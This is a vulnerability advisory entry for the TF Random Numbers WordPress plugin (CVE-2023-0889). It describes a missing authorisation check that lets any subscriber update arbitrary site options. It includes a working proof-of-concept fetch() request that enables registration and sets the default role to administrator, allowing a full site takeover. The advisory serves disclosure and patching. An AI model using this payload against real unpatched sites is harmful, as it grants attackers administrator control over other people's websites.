WordPress Plugin Vulnerabilities

TF Random Numbers < 2.0.1 - Subscriber+ Arbitrary Option Update

Description

The plugin does not have authorisation and CSRF check in an AJAX action, and does not ensure that the options to be updated belong to the plugin. As a result, it could allow any authenticated users, such as subscriber, to update arbitrary blog options, such as enabling registration and set the default role to administrator

Proof of Concept

Sign in as a subscriber and run the following code in the web console

fetch( 'admin-ajax.php', { method: 'POST', headers:{'Content-Type': 'application/x-www-form-urlencoded'}, body: 'action=tf_numb_save_licenses&data[addon_0][key]=users_can_register&data[addon_0][val]=1&data[addon_1][key]=default_role&data[addon_1][val]=administrator' } );

Log out and register an account which will be an administrator one

Affects Plugins

Plugin icon
tf-numbers-number-counter-animaton
Fixed in 2.0.1

References

CVE
CVE-2023-0889

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
8.8 (high)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
c39473a7-47fc-4bce-99ad-28d03f41e74e

Timeline

Publicly Published
2023-03-27 (about 1 years ago)
Added
2023-03-27 (about 1 years ago)
Last Updated
2023-03-27 (about 1 years ago)

Other

Published
Title
Published
2023-12-26
Title
Essential Blocks for Gutenberg < 4.2.1 - Subscriber+ Unauthorised Actions
Published
2024-02-09
Title
Awesome Support – WordPress HelpDesk & Support Plugin < 6.1.8 - Missing Authorization via wpas_get_users()
Published
2023-02-21
Title
WP OAuth Server < 4.3.0 - Subscriber+ Arbitrary Client Deletion
Published
2024-03-29
Title
DELUCKS SEO < 2.5.5 - Missing Authorization
Published
2023-12-07
Title
Smart Forms < 2.6.85 - Subscriber+ Arbitrary Options Update